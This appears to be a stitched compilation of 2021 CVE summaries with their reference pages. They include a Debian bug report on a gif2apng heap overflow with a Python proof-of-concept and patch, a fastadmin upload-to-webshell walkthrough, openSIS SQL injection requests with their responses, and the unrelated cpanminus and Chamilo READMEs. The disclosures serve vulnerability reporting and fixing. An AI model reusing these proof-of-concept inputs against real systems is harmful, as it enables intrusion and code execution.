An issue was discovered in gif2apng 1.9. There is a heap-based buffer overflow vulnerability in the DecodeLZW function. It allows an attacker to write a large amount of arbitrary data outside the boundaries of a buffer.

![version graph](https://bugs.debian.org/cgi-bin/version.cgi?collapse=1;width=2;absolute=0;package=gif2apng;found=gif2apng%2F1.9%2Bsrconly-3;height=2)

Reply or subscribe to this bug.

Toggle useless messages

**Report forwarded** to `debian-bugs-dist@lists.debian.org, Debian QA Group <packages@qa.debian.org>`: 
`Bug#1002668`; Package `gif2apng`. (Sun, 26 Dec 2021 23:00:04 GMT) (full text, mbox, link).

**Acknowledgement sent** to `Kolja Grassmann <koljagrassmann@mailbox.org>`: 
New Bug report received and forwarded. Copy sent to `Debian QA Group <packages@qa.debian.org>`. (Sun, 26 Dec 2021 23:00:04 GMT) (full text, mbox, link).

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

Package: gif2apng
Version: 1.9+srconly-3
Severity: important
Tags: security

Dear Maintainer,

There is a heap based buffer overflow in the gif2apng package. The vulnerability is located in the DecodeLZW function in the gif2apng.cpp file. The problem here is, that this function writes to a buffer, that was allocated using malloc without checking the size of this buffer. Therefore it is possible to provide a gif to the program, that contains more data than fits into this buffer leading to a memory corruption on the heap. I wrote the following poc script in python:

#!/bin/python3

# Writing to poc.gif
f = open("poc.gif", "wb")
# Data needed to enter the code path:
beginning = b"GIF87a" + b"\\x10\\x00\\x10\\x00" + b"\\x01" \* 3 + b"\\x2c" + b"\\x01" \*
9
f.write(beginning)

# Value needed in the vulnerable function
mincode = b"\\x07"
f.write(mincode)
for i in range(0,10000):
 # Size value and byte we write to the heap
 target\_char = b"\\x01" + b"A"
 f.write(target\_char)
 # Resetting the values using "clearcode" to keep the code path as simple
as possible
 clear\_code = b"\\x01" + b"\\x80"
 f.write(clear\_code)

f.close()

This script creates a file called poc.gif, which writes 10000 "A"'s into a buffer of size 512 leading to memory corruption on the heap. I tested this on Debian 10 using the current version of the package from the testing repository and got the following output:
$ gif2apng -i0 poc.gif /dev/null

gif2apng 1.9 using ZLIB

Reading 'poc.gif'...
1 frames.
malloc(): corrupted top size
Abgebrochen

This vulnerability seems to allow a write of an arbitrary number of arbitrary bytes. Therefore I think it likely, that this could be exploited.

To fix this issue locally I added a buffer\_size variable to the main function, which holds the size of the allocated buffer (the imagesize value used initially for the allocation was overwritten at some point). I then passed this value to the DecodeLZW function and added two if-statements around the writes to the the buffer to check whether the buffer can hold more bytes. My code looks as follows:

void DecodeLZW(unsigned char \* img, unsigned int img\_size, FILE \* f1) // added
parameter img\_size
{
 unsigned int bytes\_written = 0;
\[...\]
 if (lastcode == -1)
 {
 if (bytes\_written < img\_size) { // Added if-statement
 \*pout++ = suffix\[code\];
 bytes\_written++;
 }
 else {
 printf("Invalid image size\\n");
 exit(0);
 }
 firstchar = lastcode = code;
 continue;
 }
\[...\]
 do
 {
 if (bytes\_written < img\_size) { // Added if-statement
 \*pout++ = \*--pstr;
 bytes\_written++;
 }
 else {
 printf("Invalid image size\\n");
 exit(0);
 }
 }
 while (pstr > str);
\[...\]
int main(int argc, char\*\* argv)
{
 unsigned int buffer\_size = 0; // New variable to hold the size of the
buffer
\[...\]
 grayscale = 1;

 buffer\_size = imagesize\*2; // New variable, as imagesize is overwritten
at some point
 buffer = (unsigned char \*)malloc(buffer\_size);
 if (buffer == NULL)
 {
 printf("Error: not enough memory\\n");
 return 1;
 }
\[...\]
 DecodeLZW(buffer, buffer\_size, f1); // Added buffer\_size
\[...\]
 DecodeLZW(buffer, buffer\_size, f1); // Added Buffer size
\[...\]

This compiled successfully and fixed the buffer overflow for me. I am however not sure if this is the cleanest way to fix the issue and it could use some more testing.

Best regards
Kolja



-- System Information:
Debian Release: 10.11
 APT prefers oldstable-updates
 APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86\_64)

Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT\_OOT\_MODULE, TAINT\_UNSIGNED\_MODULE
Locale: LANG=de\_DE.UTF-8, LC\_CTYPE=de\_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de\_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages gif2apng depends on:
ii libc6 2.28-10
ii libzopfli1 1.0.2-1
ii zlib1g 1:1.2.11.dfsg-1

gif2apng recommends no packages.

Versions of packages gif2apng suggests:
pn apng2gif <none>

-- no debconf information

**Added tag(s) upstream.** Request was from `Salvatore Bonaccorso <carnil@debian.org>` to `control@bugs.debian.org`. (Sun, 26 Dec 2021 23:03:08 GMT) (full text, mbox, link).

Send a report that this bug log contains spam.

Debian bug tracking system administrator <owner@bugs.debian.org\>. Last modified: Tue Dec 28 01:30:14 2021; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.

CVE-2021-45909: #1002668 - gif2apng: Heap based buffer overflow in the DecodeLZW function

Zoho ManageEngine ServiceDesk Plus before 12003 allows authentication bypass in certain admin configurations.

CVE-2021-44526: ServiceDesk Plus readme | Service desk release notes | ServiceDesk Plus latest version read me notes | IT service management release notes | Service desk current version

The App::cpanminus package 1.7044 for Perl allows Signature Verification Bypass.

*   NAME
*   SYNOPSIS
*   DESCRIPTION
*   INSTALLATION
    *   Package management system
    *   Installing to system perl
    *   Installing to local perl (perlbrew, plenv etc.)
    *   Downloading the standalone executable
    *   Troubleshoot: HTTPS warnings
*   DEPENDENCIES
*   QUESTIONS
    *   How does cpanm get/parse/update the CPAN index?
    *   Where does this install modules to? Do I need root access?
    *   cpanminus can't install the module XYZ. Is it a bug?
    *   Does cpanm support the feature XYZ of CPAN and CPANPLUS?
*   COPYRIGHT
*   LICENSE
*   CREDITS
    *   CONTRIBUTORS
    *   ACKNOWLEDGEMENTS
*   COMMUNITY
*   NO WARRANTY
*   SEE ALSO

**NAME**

App::cpanminus - get, unpack, build and install modules from CPAN

**SYNOPSIS**

        cpanm Module

Run `cpanm -h` or `perldoc cpanm` for more options.

**DESCRIPTION**

cpanminus is a script to get, unpack, build and install modules from CPAN and does nothing else.

It's dependency free (can bootstrap itself), requires zero configuration, and stands alone. When running, it requires only 10MB of RAM.

**INSTALLATION**

There are several ways to install cpanminus to your system.

**Package management system**

There are Debian packages, RPMs, FreeBSD ports, and packages for other operation systems available. If you want to use the package management system, search for cpanminus and use the appropriate command to install. This makes it easy to install `cpanm` to your system without thinking about where to install, and later upgrade.

**Installing to system perl**

You can also use the latest cpanminus to install cpanminus itself:

        curl -L https://cpanmin.us | perl - --sudo App::cpanminus

This will install `cpanm` to your bin directory like `/usr/local/bin` and you'll need the `--sudo` option to write to the directory, unless you configured `INSTALL_BASE` with local::lib.

**Installing to local perl (perlbrew, plenv etc.)**

If you have perl in your home directory, which is the case if you use tools like perlbrew or plenv, you don't need the `--sudo` option, since you're most likely to have a write permission to the perl's library path. You can just do:

        curl -L https://cpanmin.us | perl - App::cpanminus

to install the `cpanm` executable to the perl's bin path, like `~/perl5/perlbrew/bin/cpanm`.

**Downloading the standalone executable**

You can also copy the standalone executable to whatever location you'd like.

        cd ~/bin
        curl -L https://cpanmin.us/ -o cpanm
        chmod +x cpanm

This just works, but be sure to grab the new version manually when you upgrade because `--self-upgrade` might not work with this installation setup.

**Troubleshoot: HTTPS warnings**

When you run `curl` commands above, you may encounter SSL handshake errors or certification warnings. This is due to your HTTP client (curl) being old, or SSL certificates installed on your system needs to be updated.

You're recommended to update the software or system if you can. If that is impossible or difficult, use the `-k` option with curl or an alternative URL, `https://git.io/cpanm`

**DEPENDENCIES**

perl 5.8.1 or later.

*   'tar' executable (bsdtar or GNU tar version 1.22 are recommended) or Archive::Tar to unpack files.
    
*   C compiler, if you want to build XS modules.
    
*   make
    
*   Module::Build (core in 5.10)
    

**QUESTIONS****How does cpanm get/parse/update the CPAN index?**

It queries the CPAN Meta DB site at http://cpanmetadb.plackperl.org/. The site is updated at least every hour to reflect the latest changes from fast syncing mirrors. The script then also falls back to query the module at http://metacpan.org/ using its search API.

Upon calling these API hosts, cpanm (1.6004 or later) will send the local perl versions to the server in User-Agent string by default. You can turn it off with `--no-report-perl-version` option. Read more about the option with cpanm, and read more about the privacy policy about this data collection at http://cpanmetadb.plackperl.org/#privacy

Fetched files are unpacked in `~/.cpanm` and automatically cleaned up periodically. You can configure the location of this with the `PERL_CPANM_HOME` environment variable.

**Where does this install modules to? Do I need root access?**

It installs to wherever ExtUtils::MakeMaker and Module::Build are configured to (via `PERL_MM_OPT` and `PERL_MB_OPT`).

By default, it installs to the site\_perl directory that belongs to your perl. You can see the locations for that by running `perl -V` and it will be likely something under `/opt/local/perl/...` if you're using system perl, or under your home directory if you have built perl yourself using perlbrew or plenv.

If you've already configured local::lib on your shell, cpanm respects that settings and modules will be installed to your local perl5 directory.

At a boot time, cpanminus checks whether you have already configured local::lib, or have a permission to install modules to the site\_perl directory. If neither, i.e. you're using system perl and do not run cpanm as a root, it automatically sets up local::lib compatible installation path in a `perl5` directory under your home directory.

To avoid this, run `cpanm` either as a root user, with `--sudo` option, or with `--local-lib` option.

**cpanminus can't install the module XYZ. Is it a bug?**

It is more likely a problem with the distribution itself. cpanminus doesn't support or may have issues with distributions such as follows:

*   Tests that require input from STDIN.
    
*   Build.PL or Makefile.PL that prompts for input even when `PERL_MM_USE_DEFAULT` is enabled.
    
*   Modules that have invalid numeric values as VERSION (such as `1.1a`)
    

These failures can be reported back to the author of the module so that they can fix it accordingly, rather than to cpanminus.

**Does cpanm support the feature XYZ of CPAN and CPANPLUS?**

Most likely not. Here are the things that cpanm doesn't do by itself.

If you need these features, use CPAN, CPANPLUS or the standalone tools that are mentioned.

*   CPAN testers reporting. See App::cpanminus::reporter
    
*   Building RPM packages from CPAN modules
    
*   Listing the outdated modules that needs upgrading. See App::cpanoutdated
    
*   Showing the changes of the modules you're about to upgrade. See cpan-listchanges
    
*   Patching CPAN modules with distroprefs.
    

See cpanm or `cpanm -h` to see what cpanminus _can_ do :)

**COPYRIGHT**

Copyright 2010- Tatsuhiko Miyagawa

The standalone executable contains the following modules embedded.

CPAN::DistnameInfo Copyright 2003 Graham Barr

local::lib Copyright 2007-2009 Matt S Trout

HTTP::Tiny Copyright 2011 Christian Hansen

Module::Metadata Copyright 2001-2006 Ken Williams. 2010 Matt S Trout

version Copyright 2004-2010 John Peacock

JSON::PP Copyright 2007-2011 by Makamaka Hannyaharamitu

CPAN::Meta, CPAN::Meta::Requirements Copyright (c) 2010 by David Golden and Ricardo Signes

CPAN::Meta::YAML Copyright 2010 Adam Kennedy

CPAN::Meta::Check Copyright (c) 2012 by Leon Timmermans

File::pushd Copyright 2012 David Golden

parent Copyright (c) 2007-10 Max Maischein

Parse::PMFile Copyright 1995 - 2013 by Andreas Koenig, Copyright 2013 by Kenichi Ishigaki

String::ShellQuote by Roderick Schertler

**LICENSE**

This software is licensed under the same terms as Perl.

**CREDITS****CONTRIBUTORS**

Patches and code improvements were contributed by:

Goro Fuji, Kazuhiro Osawa, Tokuhiro Matsuno, Kenichi Ishigaki, Ian Wells, Pedro Melo, Masayoshi Sekimura, Matt S Trout (mst), squeeky, horus and Ingy dot Net.

**ACKNOWLEDGEMENTS**

Bug reports, suggestions and feedbacks were sent by, or general acknowledgement goes to:

Jesse Vincent, David Golden, Andreas Koenig, Jos Boumans, Chris Williams, Adam Kennedy, Audrey Tang, J. Shirley, Chris Prather, Jesse Luehrs, Marcus Ramberg, Shawn M Moore, chocolateboy, Chirs Nehren, Jonathan Rockway, Leon Brocard, Simon Elliott, Ricardo Signes, AEvar Arnfjord Bjarmason, Eric Wilhelm, Florian Ragwitz and xaicron.

http://github.com/miyagawa/cpanminus - source code repository, issue tracker

irc://irc.perl.org/#cpanm - discussions about cpanm and its related tools

**NO WARRANTY**

This software is provided "as-is," without any express or implied warranty. In no event shall the author be held liable for any damages arising from the use of the software.

**SEE ALSO**

CPAN CPANPLUS pip

CVE-2020-16154: App::cpanminus

fastadmin v1.2.1 is affected by a file upload vulnerability which allows arbitrary code execution through shell access.

Detail:  
![2](https://user-images.githubusercontent.com/54835964/139025297-0b560dac-053e-4c5d-81ab-458d303b01eb.png)  
\`image.png  
POST /fastadmin/public/UCAdNKmOnG.php/ajax/upload HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0  
Accept: application/json  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Cache-Control: no-cache  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------261389892721156981001433602982  
Content-Length: 23583  
Origin: http://localhost  
Connection: close  
Cookie: Phpstorm-40b5128e=37cc58fa-2924-474e-95a3-1066d7c6bcfd; PHPSESSID=obk19k61dd4jmat3ljhkihr00h; think\_var=zh-cn  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

\-----------------------------261389892721156981001433602982  
Content-Disposition: form-data; name="file"; filename="1.png"  
Content-Type: image/png

�PNG  
�  
\`  
application/common/library/Upload.php Line 312:  
![3](https://user-images.githubusercontent.com/54835964/139025532-f34122ca-5fb7-42b3-bb5a-cb39884d8c71.png)  
Four method ,analyse one by one  
application/common/library/Upload.php#checkSize Line 120: check upload file size is not bigger than default  
![4](https://user-images.githubusercontent.com/54835964/139025581-e5ad7711-aba7-4573-99b1-a9ebea8f67bc.png)  
application/common/library/Upload.php#checkExecutable Line 82: PHP file and HTML file is not allowed to upload  
![5](https://user-images.githubusercontent.com/54835964/139025627-1c83d3c3-53d6-4a19-99be-8d6b287ff2e9.png)  
application/common/library/Upload.php#checkMimetype Line 91: check file type,$mimetypeArr is default value,$mimetypeArr =$this->config\['mimetype'\]=\[jpg,png,bmp,jpeg,gif,zip,rar,xls,xlsx,wav,mp4,mp3,pdf\],file type must in this array  
![6](https://user-images.githubusercontent.com/54835964/139025689-61d2a197-d85e-4450-bb2a-2e21ae6069b1.png)  
application/common/library/Upload.php#checkImage Line 103:check upload file is a picture,because judgment is logical or,as long as type value in\_array return true,we can upload other PHP suffix file that can be parsed，such as php5,phtml,php3 and so on  
![7](https://user-images.githubusercontent.com/54835964/139025818-e4455585-3712-4bc7-8de0-ff466ed375ac.png)  
change the content-type to gif,filename to xx.phtml  
![8](https://user-images.githubusercontent.com/54835964/139025875-14825380-af01-4de8-81d3-dba28e60eed8.png)  
however,phtml can't be parsed,I find that if the CMS is build with Debian or Ubuntu environment,attack can be succeed.Debian or Ubuntu apache2 configuration file write as follow,it will contains mods-enabled/\*.conf file automatically，which default parse phtml as php  
![9](https://user-images.githubusercontent.com/54835964/139025928-3076580a-9997-4283-a635-02754dddee26.png)  
![10](https://user-images.githubusercontent.com/54835964/139025947-132095db-6ba2-4a6c-b0a1-ab6bfad86fae.png)  
so,access the shell address to complete the attack,this ip is my debian's ip address  
![11](https://user-images.githubusercontent.com/54835964/139025994-fef79609-2feb-4ee7-9066-1811f2d81c1c.png)

CVE-2021-43117: fastadmin v1.2.1 file upload getshell · Issue #1 · ambitiousleader/some-automated-script

Raspberry Pi OS through 5.10 has the raspberry default password for the pi account. If not changed, attackers can gain administrator privileges.

CVE-2021-38759: Raspberry Pi Documentation - Configuration

chamilo-lms v1.11.14 is affected by a Cross Site Scripting (XSS) vulnerability in /plugin/jcapture/applet.php if an attacker passes a message hex2bin in the cookie.

**Chamilo 1.11.x**

![Build Status](https://camo.githubusercontent.com/aea4dedcfeccd389b971dbd8260df22698f6efffd894dfa41ee12029a54d28b1/68747470733a2f2f7472617669732d63692e6f72672f6368616d696c6f2f6368616d696c6f2d6c6d732e7376673f6272616e63683d312e31312e78) ![Scrutinizer Code Quality](https://camo.githubusercontent.com/5c8291b3300e9c54ce9a0ddc20cf6f01a4eab18b7b3795b490d373a3072e1845/68747470733a2f2f7363727574696e697a65722d63692e636f6d2f672f6368616d696c6f2f6368616d696c6f2d6c6d732f6261646765732f7175616c6974792d73636f72652e706e673f623d312e31312e78) ![Code Coverage](https://camo.githubusercontent.com/f57a179067358901bced3e99e3e211a7641cd193d7e7ab373f34425c0b228896/68747470733a2f2f7363727574696e697a65722d63692e636f6d2f672f6368616d696c6f2f6368616d696c6f2d6c6d732f6261646765732f636f7665726167652e706e673f623d312e31312e78) ![Bountysource](https://camo.githubusercontent.com/59eaeb4f05c9ff700681d0fd8ec30cb86a82f1a4c65efbf82ae2978ba71f16e2/68747470733a2f2f7777772e626f756e7479736f757263652e636f6d2f62616467652f7465616d3f7465616d5f69643d3132343339267374796c653d726169736564) ![Code Consistency](https://camo.githubusercontent.com/3bc66755dc2e12f4a374fb26d24ba33881ac3886baf05b5cf431df5b043d70ee/68747470733a2f2f737175697a6c6162732e6769746875622e696f2f5048505f436f6465536e69666665722f616e616c797369732f6368616d696c6f2f6368616d696c6f2d6c6d732f67726164652e737667) ![CII Best Practices](https://camo.githubusercontent.com/cece3b502cea381cfa2f8f9bfdc9bccf8a08d0353bad51e023691d49f32994d2/68747470733a2f2f626573747072616374696365732e636f7265696e6672617374727563747572652e6f72672f70726f6a656374732f3136362f6261646765) ![Codacy Badge](https://camo.githubusercontent.com/2657ea94f3334bacaab31f95ee9e7b8d959c5a0a832c6920bc04ed047b71f493/68747470733a2f2f6170692e636f646163792e636f6d2f70726f6a6563742f62616467652f47726164652f3838653933346161623266333462623761303339376136663632623037386232)

**Installation**

This installation guide is for development environments only.

**Install PHP, a web server and MySQL/MariaDB**

To run Chamilo, you will need at least a web server (we recommend Apache2 for commodity reasons), a database server (we recommend MariaDB but will explain MySQL for commodity reasons) and a PHP interpreter (and a series of libraries for it). If you are working on a Debian-based system (Debian, Ubuntu, Mint, etc), just type

 sudo apt-get install apache2 mysql-server php libapache2-mod-php php-gd php-intl php-curl php-json php-mysql php-zip composer
 

**Install Git**

The development version 1.11.x requires you to have Git installed. If you are working on a Debian-based system (Debian, Ubuntu, Mint, etc), just type

**Install Composer**

To run the development version 1.11.x, you need Composer, a libraries dependency management system that will update all the libraries you need for Chamilo to the latest available version.

Make sure you have Composer installed. If you do, you should be able to launch "composer" on the command line and have the inline help of composer show a few subcommands. If you don't, please follow the installation guide at https://getcomposer.org/download/

**Download Chamilo from GitHub**

Clone the repository

 sudo mkdir chamilo-1.11
 sudo chown -R `whoami` chamilo-1.11
 git clone -b 1.11.x --single-branch https://github.com/chamilo/chamilo-lms.git chamilo-1.11
 

Checkout branch 1.11.x

 cd chamilo-1.11
 git checkout --track origin/1.11.x
 git config --global push.default current
 

**Update dependencies using Composer**

From the Chamilo folder (in which you should be now if you followed the previous steps), launch:

If you face issues related to missing JS libraries, you might need to ensure that your web/assets folder is completely re-generated. Use this set of commands to do that:

 rm composer.lock
 rm -rf web/ vendor/
 composer clear-cache
 composer update
 

This will take several minutes in the best case scenario, but should definitely generate the missing files.

**Change permissions**

On a Debian-based system, launch:

 sudo chown -R www-data:www-data app main/default_course_document/images main/lang web
 

**Configure the web server**

Enable the Apache web server module "rewrite" :

 sudo a2enmod rewrite
 sudo systemctl restart apache2.service
 

Chamilo's .htaccess must be obeyed. Create /etc/apache2/conf-available/htaccessForChamilo.conf with these lines :

 <Directory /var/www/html/chamilo-lms>
 	AllowOverride All
 </Directory>
 

then enable it :

 sudo a2enconf htaccessForChamilo
 sudo systemctl reload apache2.service
 

If you just installed missing PHP extensions using apt, you must restart the web server to get them loaded :

 sudo systemctl restart apache2.service
 

**Start the installer**

In your browser, load the Chamilo URL. You should be automatically redirected to the installer. If not, add the "main/install/index.php" suffix manually in your browser address bar. The rest should be a matter of simple OK > Next > OK > Next...

**Upgrade from 1.10.x**

1.11.0 is a major version. It contains a series of new features, that also mean a series of new database changes in regards with versions 1.10.x. As such, it is necessary to go through an upgrade procedure when upgrading from 1.10.x to 1.11.x.

The upgrade procedure is relatively straightforward. If you have a 1.10.x initially installed with Git, here are the steps you should follow (considering you are already inside the Chamilo folder):

 git fetch --all
 git checkout origin 1.11.x
 

Then load the Chamilo URL in your browser, adding "main/install/index.php" and follow the upgrade instructions. Select the "Upgrade from 1.10.x" button to proceed.

If you have previously updated database rows manually, you might face issue with FOREIGN KEYS during the upgrade process. Please make sure your database is consistent before upgrading. This usually means making sure that you have to delete rows from tables referring to rows which have been deleted from the user or access\_url tables. Typically:

 DELETE FROM access\_url\_rel\_course WHERE access\_url\_id NOT IN (SELECT id FROM access\_url);

**Upgrading from non-Git Chamilo 1.10**

In the _very unlikely_ case of upgrading a "normal" Chamilo 1.10 installation (done with the downloadable zip package) to a Git-based installation, make sure you delete the contents of a few folders first. These folders are re-generated later by the `composer update` command. This is likely to increase the downtime of your Chamilo portal of a few additional minutes (plan for 10 minutes on a reasonnable internet connection).

 rm composer.lock
 rm -rf web/*
 rm -rf vendor/*
 

**For developers and testers only**

This section is for developers only (or for people who have a good reason to use a development version of Chamilo), in the sense that other people will not need to update their Chamilo portal as described here.

**Updating code**

To update your code with the latest developments in the 1.11.x branch, go to your Chamilo folder and type:

If you have made customizations to your code before the update, you will have two options:

* abandon your changes (use "git stash" to do that)
* commit your changes locally and merge (use "git commit" and then "git pull")

You are supposed to have a reasonable understanding of Git in order to use Chamilo as a developer, so if you feel lost, please check the Git manual first: http://git-scm.com/documentation

**Updating your database from new code**

Since the 2015-05-27, Chamilo offers the possibility to make partial database upgrades through Doctrine migrations.

To update your database to the latest version, go to your Chamilo root folder and type

 php bin/doctrine.php migrations:migrate --configuration=app/config/migrations.yml
 

If you want to proceed with a single migration "step" (the steps reside in src/Chamilo/CoreBundle/Migrations/Schema/V110/), then check the datetime of the version and type the following (assuming you want to execute Version20150527120703)

 php bin/doctrine.php migrations:execute 20150527120703 --up --configuration=app/config/migrations.yml
 

You can also print the differences between your database and what it should be by issuing the following command from the Chamilo base folder:

 php bin/doctrine.php orm:schema-tool:update --dump-sql
 

**Contributing**

If you want to submit new features or patches to Chamilo, please follow the Github contribution guide https://guides.github.com/activities/contributing-to-open-source/ and our CONTRIBUTING.md file. In short, we ask you to send us Pull Requests based on a branch that you create with this purpose into your repository forked from the original Chamilo repository.

**Documentation**

For more information on Chamilo, visit https://1.11.chamilo.org/documentation/index.html

CVE-2021-43687: GitHub - chamilo/chamilo-lms at v1.11.14

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/grades/InputFinalGrades.php, period parameter.

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/grades/InputFinalGrades.php, period parameter.  
![image](https://user-images.githubusercontent.com/65946483/134312067-05118737-39b5-4d5e-b095-2cb97e22a651.png)

POC:

![image](https://user-images.githubusercontent.com/65946483/134312317-a4eccf29-0921-4937-8e0e-835575ecc024.png)

REQUEST:

GET /Modules.php?modname=users/TeacherPrograms.php?include=grades/InputFinalGrades.php&include\_inactive=&modfunc=gradebook&mp=21&use\_percents=true&period=2'6 HTTP/1.1  
Host: 192.168.21.130  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,_/_;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed\_login=  
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0  
Upgrade-Insecure-Requests: 1

RESPONSE:

HTTP/1.1 200 OK  
Date: Wed, 22 Sep 2021 05:39:16 GMT  
Server: Apache/2.4.46 (Debian)  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Vary: Accept-Encoding  
Content-Length: 60208  
Connection: close  
Content-Type: text/html; charset=UTF-8

\[…\]  
SQL:  
SELECT cp.BEGIN\_DATE,cp.MARKING\_PERIOD\_ID FROM course\_periods cp,course\_period\_var cpv WHERE cpv.COURSE\_PERIOD\_ID=cp.COURSE\_PERIOD\_ID AND cpv.ID=2'6

**Traceback:**  
/var/www/opensis/modules/grades/InputFinalGrades.php at 55

**Additional Information:**  
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''6' at line 1

\[…\]

SOLUTION:

Use function sqlSecurityFilter() before assign $\_REQUEST\['period'\] into query "SELECT".

`$period = sqlSecurityFilter($_REQUEST['period']);`

![image](https://user-images.githubusercontent.com/65946483/134313713-da33c67e-504b-4f1c-813d-45e0797e5b50.png)

CVE-2021-41679: SQL INJECTION IN FUNCTION /INPUTFINALGRADES.PHP · Issue #204 · OS4ED/openSIS-Classic

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/users/Staff.php, staff{TITLE] parameter.

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/users/Staff.php, staff\[TITLE\] parameter. 
![image](https://user-images.githubusercontent.com/65946483/134302207-1037fba8-0934-4987-acdb-9482069ebd1a.png) 
![image](https://user-images.githubusercontent.com/65946483/134302281-338b2e67-582d-4784-98c5-7f85bad712ed.png)

POC 
![image](https://user-images.githubusercontent.com/65946483/134302347-753e30a6-1b84-4aa9-bc79-6a194ad2c026.png) 
REQUEST

 POST /Modules.php?modname=users/Staff.php&include=DemographicInfoInc&category_id=1&modfunc=update HTTP/1.1
 Host: 192.168.21.130
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: multipart/form-data; boundary=---------------------------42647140374471146523868129
 Content-Length: 132296
 Origin: http://192.168.21.130
 Connection: close
 Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=1
 Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
 Upgrade-Insecure-Requests: 1
 
 -----------------------------42647140374471146523868129
 Content-Disposition: form-data; name="staff[TITLE]"
 
 '
 -----------------------------42647140374471146523868129
 Content-Disposition: form-data; name="staff[FIRST_NAME]
 
 
 -----------------------------42647140374471146523868129	
 Content-Disposition: form-data; name="staff[MIDDLE_NAME]"
 
 
 -----------------------------42647140374471146523868129
 Content-Disposition: form-data; name="staff[LAST_NAME]"
 
 
 -----------------------------42647140374471146523868129
 Content-Disposition: form-data; name="staff[NAME_SUFFIX]"
 
 
 -----------------------------42647140374471146523868129
 Content-Disposition: form-data; name="staff[ALTERNATE_ID]"
 
 
 -----------------------------42647140374471146523868129
 Content-Disposition: form-data; name="staff[GENDER]"
 
 
 -----------------------------42647140374471146523868129
 Content-Disposition: form-data; name="month_staff[BIRTHDATE]"
 
 
 -----------------------------42647140374471146523868129
 Content-Disposition: form-data; name="day_staff[BIRTHDATE]"
 
 
 -----------------------------42647140374471146523868129
 Content-Disposition: form-data; name="year_staff[BIRTHDATE]"
 
 
 -----------------------------42647140374471146523868129
 Content-Disposition: form-data; name="staff[ETHNICITY_ID]"
 
 
 -----------------------------42647140374471146523868129
 Content-Disposition: form-data; name="staff[PRIMARY_LANGUAGE_ID]"
 
 
 -----------------------------42647140374471146523868129
 Content-Disposition: form-data; name="staff[SECOND_LANGUAGE_ID]"
 
 
 -----------------------------42647140374471146523868129
 Content-Disposition: form-data; name="staff[THIRD_LANGUAGE_ID]"
 
 
 -----------------------------42647140374471146523868129
 Content-Disposition: form-data; name="staff[EMAIL]"
 
 
 -----------------------------42647140374471146523868129
 Content-Disposition: form-data; name="staff[PHYSICAL_DISABILITY]"
 
 N
 -----------------------------42647140374471146523868129
 Content-Disposition: form-data; name="staff[DISABILITY_DESC]"
 
 
 -----------------------------42647140374471146523868129
 Content-Disposition: form-data; name="file"; filename="alf\'a.php"
 Content-Type: image/png
 
 
 -----------------------------42647140374471146523868129
 Content-Disposition: form-data; name="imgblob"
 
 
 -----------------------------42647140374471146523868129
 Content-Disposition: form-data; name="upbtn"
 
 UPLOAD
 -----------------------------42647140374471146523868129--
 
 

RESPONSE

 HTTP/1.1 200 OK
 Date: Wed, 22 Sep 2021 05:39:16 GMT
 Server: Apache/2.4.46 (Debian)
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate
 Pragma: no-cache
 Vary: Accept-Encoding
 Content-Length: 60208
 Connection: close
 Content-Type: text/html; charset=UTF-8
 
 […]
 		<TD>INSERT INTO staff (CURRENT_SCHOOL_ID,TITLE,PHYSICAL_DISABILITY) values(1,'\''','N')</TD>
 		</TR>
 		</TR><TR>
 			<TD align=right>Traceback:</TD>
 			<TD>/var/www/opensis/modules/users/Staff.php at 590</TD>
 		</TR>
 		</TR><TR>
 			<TD align=right>Additional Information:</TD>
 			<TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'N')' at line 1</TD>
 		</TR>
 		</TABLE>
 		<TABLE CELLSPACING=10 BORDER=0>
 […]
 
 

SOLUTION 
